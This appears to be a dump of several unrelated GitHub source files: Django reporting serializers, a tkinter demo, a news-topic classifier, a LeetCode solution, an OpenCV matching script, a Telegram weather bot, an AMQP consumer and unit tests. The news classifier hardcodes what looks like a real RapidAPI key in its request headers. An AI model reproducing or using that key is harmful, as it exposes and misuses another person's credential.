@swagger_serializer_method(serializer_or_field=TkPalvelussuhdeSerializer)\n def get_palvelussuhteet(self, instance):\n id_qs = get_related_object_changed_id_qs(Palvelussuhde.get_name(), self.datetime_gt,\n self.datetime_lte, additional_filters=Q(parent_instance_id=instance.id))\n\n last_parent_subquery = get_history_value_subquery(Palvelussuhde, 'tyontekija_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Palvelussuhde, 'tyontekija_id', self.datetime_gt)\n palvelussuhde_qs = (Palvelussuhde.history\n .filter(id__in=Subquery(id_qs), tyontekija_id=instance.id,\n history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkPalvelussuhdeSerializer(palvelussuhde_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkTaydennyskoulutusSerializer)\n def get_taydennyskoulutukset(self, instance):\n id_qs = get_related_object_changed_id_qs(\n Tyontekija.get_name(), self.datetime_gt, self.datetime_lte, return_value='parent_instance_id',\n additional_filters=Q(instance_id=instance.id) & Q(trigger_model_name=TaydennyskoulutusTyontekija.get_name())\n )\n taydennyskoulutus_qs = (Taydennyskoulutus.history\n .filter(id__in=Subquery(id_qs), history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date'))\n return TkTaydennyskoulutusSerializer(taydennyskoulutus_qs, many=True, context=self.context).data\n\n\nclass ValssiOrganisaatioSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n parent_oid = serializers.CharField(default=settings.OPETUSHALLITUS_ORGANISAATIO_OID)\n\n class Meta:\n model = Organisaatio\n fields = ('id', 'action', 'nimi', 'y_tunnus', 'organisaatio_oid', 'parent_oid', 'organisaatiotyyppi',\n 'kunta_koodi', 'sahkopostiosoite', 'kayntiosoite', 'kayntiosoite_postinumero',\n 'kayntiosoite_postitoimipaikka', 'postiosoite', 'postinumero', 'postitoimipaikka', 'puhelinnumero',\n 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass ValssiToimipaikkaSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n parent_oid = serializers.SerializerMethodField()\n organisaatiotyyppi = 
serializers.ListField(child=serializers.CharField(),\n default=[Organisaatiotyyppi.TOIMIPAIKKA.value])\n\n class Meta:\n model = Toimipaikka\n fields = ('id', 'action', 'nimi', 'organisaatio_oid', 'parent_oid', 'organisaatiotyyppi', 'postinumero',\n 'jarjestamismuoto_koodi', 'toimintamuoto_koodi')\n\n @swagger_serializer_method(serializer_or_field=serializers.CharField)\n def get_parent_oid(self, instance):\n organisaatio = (Organisaatio.history\n .filter(id=instance.vakajarjestaja_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n return getattr(organisaatio, 'organisaatio_oid', None)\n\n\nclass ValssiTyoskentelypaikkaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tyoskentelypaikka\n fields = ('tehtavanimike_koodi', 'kelpoisuus_kytkin',)\n\n\nclass ValssiTyontekijaSerializer(serializers.ModelSerializer):\n kutsumanimi = serializers.CharField(source='henkilo.kutsumanimi')\n sukunimi = serializers.CharField(source='henkilo.sukunimi')\n tutkinnot = serializers.SerializerMethodField()\n tehtavanimikkeet = serializers.SerializerMethodField()\n\n class Meta:\n model = Tyontekija\n fields = ('id', 'kutsumanimi', 'sukunimi', 'sahkopostiosoite', 'tutkinnot', 'tehtavanimikkeet',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.CharField()))\n def get_tutkinnot(self, instance):\n return (Tutkinto.objects\n .filter(henkilo=instance.henkilo, vakajarjestaja=instance.vakajarjestaja)\n .distinct('id').values_list('tutkinto_koodi', flat=True))\n\n @swagger_serializer_method(serializer_or_field=ValssiTyoskentelypaikkaSerializer(many=True))\n def get_tehtavanimikkeet(self, instance):\n today = datetime.date.today()\n tyoskentelypaikka_qs = (Tyoskentelypaikka.objects\n .filter(get_active_filter(today), palvelussuhde__tyontekija=instance,\n toimipaikka=self.context['view'].toimipaikka)\n .distinct('tehtavanimike_koodi')\n .order_by('tehtavanimike_koodi', '-kelpoisuus_kytkin'))\n return ValssiTyoskentelypaikkaSerializer(tyoskentelypaikka_qs, many=True, context=self.context).data\n\n\nclass ValssiTaustatiedotToimipaikatSerializer(serializers.Serializer):\n total = serializers.IntegerField()\n toimintamuodot = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_OBJECT,\n 'properties': {\n 'total': {\n 'type': openapi.TYPE_INTEGER\n }\n },\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n }\n })\n\n\nclass ValssiTaustatiedotTyontekijatSerializer(serializers.Serializer):\n total = serializers.IntegerField()\n tehtavanimikkeet = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n })\n tehtavanimikkeet_kelpoiset = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n })\n\n\nclass ValssiTaustatiedotTaydennyskoulutuksetSerializer(serializers.Serializer):\n tehtavanimikkeet = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_INTEGER\n }\n })\n koulutuspaivat = DecimalField(0, 0)\n tehtavanimikkeet_koulutuspaivat = CustomSchemaField({\n 'type': openapi.TYPE_OBJECT,\n 'additionalProperties': {\n 'type': openapi.TYPE_STRING,\n 'format': openapi.FORMAT_DECIMAL\n }\n })\n\n\nclass ValssiTaustatiedotSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n organisaatio_oid = serializers.CharField()\n toimipaikat = ValssiTaustatiedotToimipaikatSerializer()\n 
lapset_voimassa = serializers.IntegerField()\n tyontekijat = ValssiTaustatiedotTyontekijatSerializer()\n taydennyskoulutukset = ValssiTaustatiedotTaydennyskoulutuksetSerializer()\n","repo_name":"Opetushallitus/varda","sub_path":"webapps/varda/serializers_reporting.py","file_name":"serializers_reporting.py","file_ext":"py","file_size_in_byte":57875,"program_lang":"python","lang":"fi","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"71996235046","text":"from tkinter import *\n\nmaster = Tk()\n\ndef test1():\n\tif e1.get() ==\"浩文哥\":\n\t\tprint(\"Great! Correct!\")\n\t\treturn True\n\telse:\n\t\tprint(\"Wrong!\")\n\t\te1.delete(0,END)\n\t\treturn False\ndef test2():\n\tprint(\"Boo-hoo!!!\")\n\treturn False\nv = StringVar()\n\ne1 = Entry(master,textvariable = v,validate = \"focusout\",validatecommand = test1,invalidcommand=test2)\ne2 = Entry(master)\ne1.pack(padx = 10, pady = 10)\ne2.pack(padx = 10, pady = 10)\n\nmainloop()\n","repo_name":"Haowen-Zhong/Python-Learning","sub_path":"May/Tkinter/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32963637797","text":"import http.client\nimport json\nimport os\nimport pickle\nimport random\nimport re\nimport string\nfrom termcolor import colored\nfrom collections import defaultdict\n\nfrom nltk import FreqDist, word_tokenize\nfrom nltk.corpus import stopwords\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n\nstop_words = set(stopwords.words('english'))\n# stop_words.add('war')\n\nLABELS = ['business', 'entertainment', 'politics', 'sport', 'tech']\nBASE_DIR = os.getcwd()\n\n\ndef create_data_set():\n with open('data.txt', 'w', encoding='utf-8') as outfile:\n for label in LABELS:\n directory = '%s/NewsArticles/%s' % (BASE_DIR, label)\n for filename in os.listdir(directory):\n full_filename = '%s/%s' % (directory, filename)\n with open(full_filename, 'rb') as file:\n text = file.read().decode(errors='replace').replace('\\n', '')\n outfile.write('%s\\t%s\\t%s\\n' % (label, filename, text))\n\n\ndef setup_docs():\n documents = []\n with open('data.txt', 'r', encoding='utf-8') as datafile:\n for row in datafile:\n parts = row.split('\\t')\n doc = (parts[0], parts[2].strip())\n documents.append(doc)\n return documents\n\n\ndef print_frequency_dist(documents):\n tokens = defaultdict(list)\n for doc in documents:\n doc_label = doc[0]\n doc_text = clean_text(doc[1])\n doc_tokens = get_tokens(doc_text)\n tokens[doc_label].extend(doc_tokens)\n\n for category_label, category_tokens in tokens.items():\n fd = FreqDist(category_tokens)\n print(category_label, fd.most_common(20))\n\n\ndef clean_text(text):\n text = text.translate(str.maketrans('', '', string.punctuation))\n text = text.lower()\n return text\n\n\ndef get_tokens(text):\n tokens = word_tokenize(text)\n tokens = [t for t in tokens if t not in stop_words]\n return tokens\n\n\ndef lemmatizer(txt):\n txt = re.sub(r\"\\W\", ' ', txt)\n txt = re.sub(r'\\s+[a-zA-Z]\\s+', ' ', txt)\n txt = re.sub(r'\\^[a-zA-Z]\\s+', ' ', txt)\n txt = re.sub(r'\\s+', ' ', txt, flags=re.I)\n txt = txt.lower()\n return txt\n\n\ndef get_splits(docs):\n random.shuffle(docs)\n X_train = []\n y_train = []\n X_test = []\n y_test = []\n\n pivot = int(.80 * len(docs))\n\n for i in range(0, pivot):\n X_train.append(docs[i][1])\n y_train.append(docs[i][0])\n\n for i in range(pivot, len(docs)):\n        
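# the remaining ~20% of the shuffled docs form the held-out test split\n        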
X_test.append(docs[i][1])\n y_test.append(docs[i][0])\n\n return X_train, X_test, y_train, y_test\n\n\ndef evaluate_classifier(title, classifier, vectorizer, X_test, y_test):\n X_test_tfidf = vectorizer.transform(X_test)\n y_pred = classifier.predict(X_test_tfidf)\n\n precision = metrics.precision_score(y_test, y_pred, average='micro')\n recall = metrics.recall_score(y_test, y_pred, average='micro')\n f1 = metrics.f1_score(y_test, y_pred, average='micro')\n\n print(\"%s\\t%f\\t%f\\t%f\\n\" % (title, precision, recall, f1))\n\n\ndef train_classifier(docs):\n X_train, X_test, y_train, y_test = get_splits(docs)\n vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 3), min_df=3, analyzer='word')\n dtm = vectorizer.fit_transform(X_train)\n naive_bayes_classifier = MultinomialNB().fit(dtm, y_train)\n evaluate_classifier('Naive Bayes\\tTRAIN\\t', naive_bayes_classifier, vectorizer, X_train, y_train)\n evaluate_classifier('Naive Bayes\\tTEST\\t', naive_bayes_classifier, vectorizer, X_test, y_test)\n\n clf_filename = 'naive_bayes_classifier.pkl'\n pickle.dump(naive_bayes_classifier, open(clf_filename, 'wb'))\n\n vec_filename = 'count_vectorizer.pkl'\n pickle.dump(vectorizer, open(vec_filename, 'wb'))\n\n\ndef classify(title, text):\n clf_filename = 'naive_bayes_classifier.pkl'\n nb_clf = pickle.load(open(clf_filename, 'rb'))\n\n vec_filename = 'count_vectorizer.pkl'\n vectorizer = pickle.load(open(vec_filename, 'rb'))\n\n pred = nb_clf.predict(vectorizer.transform([text]))\n print(colored('Brief annotation of the text: '.ljust(35), 'red') + colored(title, 'blue', attrs=['blink']))\n print(colored('Predicted topic of the text: '.ljust(35), 'yellow') + colored(pred[0].upper(), 'magenta',\n attrs=['bold', 'underline']))\n save_files(title, pred[0])\n print(colored('\\n ******* \\n', 'green'))\n # d = {title: pred[0]}\n # print(json.dumps(d))\n\n\ndef save_files(title, topic):\n title = title.split(':')[0] if len(title.split(':')) > 1 else title\n if not os.path.exists('Saved/' + topic):\n os.makedirs('Saved/' + topic)\n if not os.path.isfile('Saved/' + topic + '/' + title + \".txt\"):\n with open('Saved/' + topic + '/' + title + \".txt\", \"w\") as file:\n file.write(title)\n\ndef fetch_articles():\n conn = http.client.HTTPSConnection(\"newscatcher.p.rapidapi.com\")\n\n headers = {\n 'x-rapidapi-host': \"newscatcher.p.rapidapi.com\",\n 'x-rapidapi-key': \"1003d62a71msh23a608e75d952c1p19542fjsn3d3e40adc5d0\"\n }\n\n conn.request(\"GET\", \"/v1/latest_headlines?lang=en&media=True\", headers=headers)\n\n res = conn.getresponse()\n data = res.read()\n\n news = json.loads(data)['articles']\n for piece in news:\n classify(piece['title'], piece['summary'])\n\n\nif __name__ == '__main__':\n fetch_articles()\n # all_docs = setup_docs()\n # print_frequency_dist(all_docs)\n\n # train_classifier(all_docs)\n # create_data_set()\n # print(all_docs[0][1])\n # print(lemmatizer(all_docs[0][1]))\n","repo_name":"eugenart/Acad","sub_path":"Python/ArticlesFetch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72623407205","text":"class Solution:\n def isCompleteTree(self, root: TreeNode) -> bool:\n \n queue = collections.deque([(root, 1)]) \n \n tree = collections.defaultdict(list)\n \n while queue:\n node, depth = queue.popleft() \n tree[depth] += [node.val if node else None]\n if not node: continue \n queue.extend([(node.left, depth+1), (node.right, depth+1)]) \n \n keys = 
list(sorted(tree.keys()))\n \n # compare against None explicitly so a node value of 0 is not mistaken for a missing node\n a, b = all(all(v is not None for v in tree[i]) for i in keys[:-2]), True\n if len(keys) >= 2:\n x = tree[keys[-2]] \n found = False\n for i in x:\n if i is None: \n found = True\n elif found:\n return False\n \n return a and b\n \n\"\"\"\nBFS\ncheck if None in level before adding\n if so, return False\n\"\"\"\n ","repo_name":"josharnoldjosh/LeetCodeSolutions","sub_path":"check-completeness-of-a-binary-tree/check-completeness-of-a-binary-tree.py","file_name":"check-completeness-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11154729285","text":"import sys\nimport numpy as np\nimport cv2\n\n\n# Load the images\nsrc1 = cv2.imread('./images/graf1.png', cv2.IMREAD_GRAYSCALE)\nsrc2 = cv2.imread('./images/graf3.png', cv2.IMREAD_GRAYSCALE)\n\nif src1 is None or src2 is None:\n print('Image load failed!')\n sys.exit()\n\n# Create the feature detector object (KAZE, AKAZE, ORB, etc.)\n# feature = cv2.KAZE_create()\n# feature = cv2.AKAZE_create()\nfeature = cv2.ORB_create()\n\n# Detect keypoints and compute descriptors\nkp1, desc1 = feature.detectAndCompute(src1, None)\nkp2, desc2 = feature.detectAndCompute(src2, None)\n\n# Match the keypoints\n# Real-valued descriptors such as SIFT, SURF and KAZE should use the L2 norm\n# matcher = cv2.BFMatcher_create()\n# Binary descriptors such as AKAZE, ORB and BRIEF should use NORM_HAMMING (Hamming distance), as below\nmatcher = cv2.BFMatcher_create(cv2.NORM_HAMMING)\n\n# Perform the matching using the descriptors\nmatches = matcher.match(desc1, desc2)\nmatches = sorted(matches, key=lambda m: m.distance) # sort by distance so the slice below keeps the best matches\ngood_matches = matches[:100]\n\nprint('# of kp1:', len(kp1))\nprint('# of kp2:', len(kp2))\nprint('# of matches:', len(matches))\n\n# Draw the keypoint matches\ndst = cv2.drawMatches(src1, kp1, src2, kp2, good_matches, None)\n\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()","repo_name":"tmd9936/ys_study","sub_path":"comVision/특징점매칭.py","file_name":"특징점매칭.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37620689717","text":"import telebot\nimport requests\nimport secrets\n\nAPI_KEY = secrets.API_KEY\nAPI_TOKEN = secrets.API_TOKEN\n\nbot = telebot.TeleBot(API_TOKEN)\n\n\n# Handle '/start' and '/help'\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n bot.reply_to(message, \"\"\"\n Hello, I am a weather information bot\n command: /weathern <cityname>\n\"\"\")\n\n@bot.message_handler(commands=['weathern'])\ndef send_weather(message): # renamed from send_welcome so each handler has a distinct name\n bot.reply_to(message, \"fetching weather...\")\n # print(message)\n # m = dict(message)\n city = message.json[\"text\"].split()[-1]\n # city = m[\"json\"][\"text\"].split()[-1]\n # print(city)\n # print(\"https://api.weatherapi.com/v1/current.json?key=\"+API_KEY+\"&q=\"+city+\"&aqi=no\")\n a = requests.get(\"https://api.weatherapi.com/v1/current.json?key=\"+API_KEY+\"&q=\"+city+\"&aqi=no\")\n a = a.json() # parse the JSON response instead of calling eval() on untrusted text\n # print(a)\n msg = a[\"location\"][\"name\"]+\"\\nwind (km/h) \"+str(a[\"current\"][\"wind_kph\"])+a[\"current\"][\"wind_dir\"]+\"\\n\\\nhumidity \"+str(a[\"current\"][\"humidity\"])+\"\\nfeels like \"+str(a[\"current\"][\"feelslike_c\"])+\"°C\"\n\n\n bot.reply_to(message, msg)\n\n@bot.message_handler(commands=['.'])\ndef send_commands(message): # renamed from send_welcome so each handler has a distinct name\n bot.reply_to(message, \"/start, /help, /game\")\n\n\n\n# Handle all other messages with content_type 'text' (content_types defaults to ['text'])\n@bot.message_handler(func=lambda message: True)\ndef echo_message(message):\n # print(message)\n bot.reply_to(message, 
message.text)\n\n\nbot.infinity_polling()\n","repo_name":"anuragdaksh7/telebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39255316550","text":"import unittest\nfrom fitterlog.interface import Sentence , Clause\nimport random\nfrom YTools.universe.exceptions import ArgumentError\n\nclass TestInterface(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.s = Sentence(predicate_struct = Clause( sons = [\n\t\t\tClause(\"loss\" , haha = 2333 , default = 0 , sons = [\n\t\t\t\tClause(\"test\" , display = True , default = 0) ,\n\t\t\t\tClause(\"dev\" , display = True , default = 1) , \n\t\t\t]) , \n\t\t\tClause(\"hyper parameter\" , display = False , sons = [\n\t\t\t\tClause(\"n\" , default = 12) , \n\t\t\t\tClause(\"m\") , \n\t\t\t]),\n\t\t\tClause(\"acc\" , display = False , sons = [\n\t\t\t\tClause(\"dev\" , display = True , default = 3) , \n\t\t\t]),\n\t\t\tClause(\"note\" , default = \"\")\n\t\t]))\n\n\t\tself.sb = Sentence(predicate_struct = Clause( sons = [\n\t\t\tClause(\"loss\" , haha = 2333 , default = 0 , sons = [\n\t\t\t\tClause(\"test\" , display = True , default = 0) ,\n\t\t\t\tClause(\"dev\" , display = True , default = 4) , \n\t\t\t]) , \n\t\t\tClause(\"hyper parameter\" , display = False , sons = [\n\t\t\t\tClause(\"n\" , default = 12) , \n\t\t\t]),\n\t\t\tClause(\"note\" , default = \"\")\n\t\t]))\n\n\tdef tearDown(self):\n\t\tself.s = None\n\t\tself.sb = None\n\n\tdef test_sentence(self):\n\n\t\ts = self.s\n\t\tsb = self.sb\n\n\t\tself.assertEqual(s[\"loss\"].attrs[\"haha\"] , 2333)\n\t\tself.assertEqual(s[\"test\"].attrs[\"display\"] , True)\n\t\tself.assertEqual(s[\"n\"].attrs[\"default\"] , 12)\n\t\twith self.assertRaises(ArgumentError):\n\t\t\t\tprint (s[\"dev\"])\n\t\tself.assertEqual(sb[\"dev\"].attrs[\"default\"] , 4)\n\n\n\t\ts[\"test\"].update(3)\n\t\t\n\t\tself.assertEqual(s[\"test\"].value , 3)\t\t\n\t\tself.assertEqual(s[\"loss\"][\"dev\"].value , 1)\n\t\tself.assertEqual(s[\"acc\"][\"dev\"].value , 3)\n\t\tself.assertIs(s[\"loss\"][\"dev\"]._value.value , None)\n\t\tself.assertEqual(s[\"note\"].value , \"\")\n\t\tself.assertIs(s[\"m\"].value , None)\n\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"num_layers\"]\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"num_heads\"]\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"d\"]\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"is_torch\"]\n\n\t\tcmd_hyper = {\n\t\t\t\"num_layers\" : 3 ,\n\t\t\t\"num_heads\" : 16 ,\n\t\t\t\"d\" : 128 , \n\t\t\t\"is_torch\": False , \n\t\t}\n\n\t\ts.new_clauses_from_dict(cmd_hyper)\n\n\t\tself.assertEqual(s[\"num_layers\"].value \t, 3 \t)\n\t\tself.assertEqual(s[\"num_heads\"].value \t, 16 \t)\n\t\tself.assertEqual(s[\"d\"].value \t\t\t, 128 \t)\n\t\tself.assertEqual(s[\"is_torch\"].value \t, False\t)\n\n\t\twith self.assertRaises(ArgumentError):\n\t\t\ts[\"Acc\"]\n\n\t\tself.assertEqual(s[\"test\"].value , 3)\t\t\n\n\t\ts.new_clause(\"Acc\")\n\t\ts[\"Acc\"].new_clause(\"train\" , default = 0)\n\t\ts[\"Acc\"].new_clause(\"test\" )\n\n\t\tself.assertIs(s[\"Acc\"][\"test\"].value , None)\n\t\tself.assertEqual(s[\"Acc\"][\"train\"].value , 0)\n\t\twith self.assertRaises(ArgumentError):\n\t\t\t\tprint (s[\"test\"])\n\n\tdef test_syntax(self):\n\n\t\ts = self.s\n\t\tsb = self.sb\n\n\t\tcc = \"-fitterlog-concat-\"\n\n\t\tself.assertEqual(s[\"loss\"]._pred.name, 
\"{0}_fitterlog_root{0}loss\".format(cc))\n\t\tself.assertEqual(s[\"test\"]._pred.name, \"{0}_fitterlog_root{0}loss{0}test\".format(cc))\n\t\tself.assertEqual(s[\"test\"]._clause.name, \"test\")\n\t\tself.assertEqual(s[\"test\"]._clause.real_name, \"{0}_fitterlog_root{0}loss{0}test\".format(cc))\n\n\t\tself.assertEqual(s[\"n\"]._pred.id , sb[\"n\"]._pred.id)\n\n\n\tdef test_save_and_load(self):\n\t\ts = Sentence(predicate_struct = Clause( sons = [\n\t\t\tClause(\"loss\" , haha = 2333 , default = 0 , sons = [\n\t\t\t\tClause(\"test\" , display = True , default = 0 , fucke = \"me\") ,\n\t\t\t\tClause(\"dev\" , display = True , default = 1) , \n\t\t\t]) , \n\t\t\tClause(\"hyper parameter\" , display = False , sons = [\n\t\t\t\tClause(\"n\" , default = 12) , \n\t\t\t\tClause(\"m\") , \n\t\t\t]),\n\t\t\tClause(\"acc\" , display = False , sons = [\n\t\t\t\tClause(\"dev\" , display = True , default = 1) , \n\t\t\t]),\n\t\t\tClause(\"note\" , default = \"\")\n\t\t]))\n\n\t\ts[\"test\"].update(3)\n\t\ts[\"test\"].update(2)\n\t\ts[\"test\"].update(1)\n\t\ts[\"m\"].update(2333)\n\n\t\ts.save()\n\n\t\tthe_noun = s.noun\n\n\t\tsb = Sentence(noun = the_noun)\n\t\tself.assertEqual(sb[\"test\"].value , s[\"test\"].value)\n\t\tself.assertEqual(sb[\"test\"].value , 1)\n\t\tself.assertEqual(sb[\"test\"].attrs[\"display\"] , True)\n\t\tself.assertEqual(sb[\"test\"].attrs[\"fucke\"] , \"me\")\n\t\tself.assertEqual(sb[\"loss\"].attrs[\"haha\"] , s[\"loss\"].attrs[\"haha\"])\n\t\tself.assertEqual(sb[\"loss\"].attrs[\"haha\"] , 2333)\n\n\nif __name__ == \"__main__\":\n\tunittest.main()\n\t","repo_name":"FFTYYY/FitterLog","sub_path":"test/units/test_interface.py","file_name":"test_interface.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"12568281154","text":"import pika\nimport os\nimport psycopg2\nfrom datetime import datetime\nimport json\n\n\nenv_file_path = '../.env'\nimage_dir_path = ''\ndb_params = {\n 'dbname': 'event_db',\n 'user': 'server',\n 'password': 'server',\n 'host': 'localhost',\n 'port': '5432'\n}\nevent_table = 'event_table'\n\n\n# Get the timestamp of the event\ndef getTimestampFromEvent(event):\n data = json.loads(event)\n timestamp_str = data.get('@timestamp')\n if timestamp_str:\n timestamp = datetime.strptime(timestamp_str, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n return timestamp\n else:\n return None\n\n\n# Get image path go with this event\ndef getImagePathFromEvent(event):\n image_path = ''\n return image_path\n\n\n# Insert event to database\ndef insert_db(event):\n timestamp = getTimestampFromEvent(event)\n image_path = getImagePathFromEvent(event)\n\n # Data to insert to database\n data_to_insert = (timestamp, event, image_path)\n try:\n # Connect to the PostgreSQL database\n connection = psycopg2.connect(**db_params)\n\n # Create a cursor object\n cursor = connection.cursor()\n\n # SQL statement to insert data into the table\n insert_query = \"INSERT INTO \" + event_table + \\\n \" (timestamp, event, image_path) VALUES (%s, %s, %s)\"\n\n cursor.execute(insert_query, data_to_insert)\n\n except (Exception, psycopg2.Error) as error:\n print(f\"Error inserting data: {error}\")\n\n\n# Read and parse the .env file\nwith open(env_file_path) as f:\n for line in f:\n if line.strip() and not line.strip().startswith(\"#\"):\n key, value = line.strip().split(\"=\", 1)\n os.environ[key] = value\n\n# Read the AMQP server configuration from the environment variables\namqp_url = 
os.environ.get('AMQP_URL')\nqueue_name = os.environ.get('QUEUE')\n\n# Create a connection to the AMQP server using the configuration\nconnection_parameters = pika.URLParameters(amqp_url)\nconnection = pika.BlockingConnection(connection_parameters)\nchannel = connection.channel()\n\n# Declare the queue\nchannel.queue_declare(queue=queue_name)\n\n\n# Define a callback function to process incoming messages\ndef callback(ch, method, properties, body):\n # Decode the message from bytes to string\n decoded_message = body.decode('utf-8')\n print(f\"{decoded_message}\")\n\n decoded_message = decoded_message.replace(\"\\n\", \"\")\n # insert_db(decoded_message)\n\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\n# Set up the consumer and specify the callback function\nchannel.basic_consume(\n queue=queue_name, on_message_callback=callback)\n\n# Start consuming messages\nprint('Waiting for messages. To exit, press CTRL+C')\ntry:\n channel.start_consuming()\nexcept KeyboardInterrupt:\n channel.stop_consuming()\n","repo_name":"acsii-63/cloud-based","sub_path":"sample/receive_cloud.py","file_name":"receive_cloud.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33641300087","text":"import unittest\nimport numpy as np\nimport spin_dynamics\n\n#-----------------------------------------------------------------------------#\n#-----------------------------------------------------------------------------#\n\n#Radical parameters\nnA = 5\nmA = np.array([2,2,2,2,2])\nA_tensorA = np.zeros([5,3,3], dtype=float)\nA_tensorA[0] = np.array([[-0.0636, 0.0, 0.0],\n [0.0, -0.0636, 0.0],\n [0.0, 0.0, 1.0812]])\nA_tensorA[1] = A_tensorA[0]\nA_tensorA[2] = A_tensorA[0]\nA_tensorA[3] = A_tensorA[0]\nA_tensorA[4] = A_tensorA[0]\n\nnB = 5\nmB = np.array([2,2,2,2,2])\nA_tensorB = np.zeros([5,3,3], dtype=float)\nA_tensorB[0] = np.array([[-0.0989, 0.0, 0.0],\n [0.0, -0.0989, 0.0],\n [0.0, 0.0, 1.7569]])\nA_tensorB[1] = A_tensorB[0]\nA_tensorB[2] = A_tensorB[0]\nA_tensorB[3] = A_tensorB[0]\nA_tensorB[4] = A_tensorB[0]\n\n#E-E coupling parameters\nJ = 0.0\nD = -0.4065\nD_epsilon = np.pi/4.0\n\n#External field parameters\nB0 = 50\ntheta = 0.0\nphi = 0.0\n\n#SymmetricUncoupledApprox convergence parameters\nnlow_bins = 4000\nnhigh_bins = 1000\nepsilon = 100\n\n#Rf field parameters\nB1 = 50\ntheta_rf = 0.0\nphi_rf = 0.0\nw_rf = 1.317E7\nphase = 0.0\n\n#Broadband parameters\nwrf_min = 1.0E6\nwrf_max = 1.0E7\nwrf_0 = 1.0E3\n\n#Gamma Compute time steps\nnt = 128\n\n#Number of KMC trajectories\nntrajectories = 1000000\n\n#-----------------------------------------------------------------------------#\n#-----------------------------------------------------------------------------#\n\nclass TestSymmetricUncoupledExactGPU(unittest.TestCase):\n\n global nA, mA, A_tensorA\n global nB, mB, A_tensorB\n global B0, theta, phi\n\n def test_sy_calc(self):\n parameters = spin_dynamics.Parameters(\n calculation_flag=\"static\", kS=1.0E6, kT=1.0E6, \n J=0.0, D=0.0, D_epsilon=0.0, num_threads=12,\n approx_flag=\"exact\", gpu_flag=True)\n hA, hB = spin_dynamics.build_hamiltonians(\n parameters, nA, nB, mA, mB, A_tensorA, A_tensorB)\n hA.transform(B0, theta, phi)\n hB.transform(B0, theta, phi)\n\n output = spin_dynamics.compute_singlet_yield(parameters, hA=hA, hB=hB)\n\n self.assertAlmostEqual(output, 0.388335592180034, 7,\n \"Symmetric Uncoupled Exact GPU failed\")\n 
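\n # NOTE (added sketch, hypothetical): the reference value asserted above would presumably be\n # cross-checked against the CPU path by repeating the same call with gpu_flag=False, e.g.\n # spin_dynamics.Parameters(calculation_flag=\"static\", kS=1.0E6, kT=1.0E6, J=0.0, D=0.0,\n # D_epsilon=0.0, num_threads=12, approx_flag=\"exact\", gpu_flag=False)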
\n#-----------------------------------------------------------------------------#\n\nclass TestFloquetUncoupledSingleFrequencyGPU(unittest.TestCase):\n\n global nA, mA, A_tensorA\n global nB, mB, A_tensorB\n global B0, theta, phi\n global B1, theta_rf, phi_rf\n global w_rf, phase\n\n def test_sy_calc(self):\n parameters = spin_dynamics.Parameters(\n calculation_flag='floquet', kS=1.0E3, kT=1.0E3,\n J=0.0, D=0.0, D_epsilon=0.0, num_threads=1,\n epsilon=epsilon, nfrequency_flag='single_frequency',\n gpu_flag=True)\n hA, hB = spin_dynamics.build_hamiltonians(\n parameters, nA, nB, mA, mB, A_tensorA, A_tensorB)\n hA.transform(B0, theta, phi, B1, theta_rf, phi_rf)\n hB.transform(B0, theta, phi, B1, theta_rf, phi_rf)\n\n hA.floquet_matrices(parameters, w_rf, phase)\n hB.floquet_matrices(parameters, w_rf, phase)\n\n output = spin_dynamics.compute_singlet_yield(parameters, hA=hA, hB=hB)\n \n self.assertAlmostEqual(output, 0.38771746823315695, 7,\n \"Floquet Uncoupled 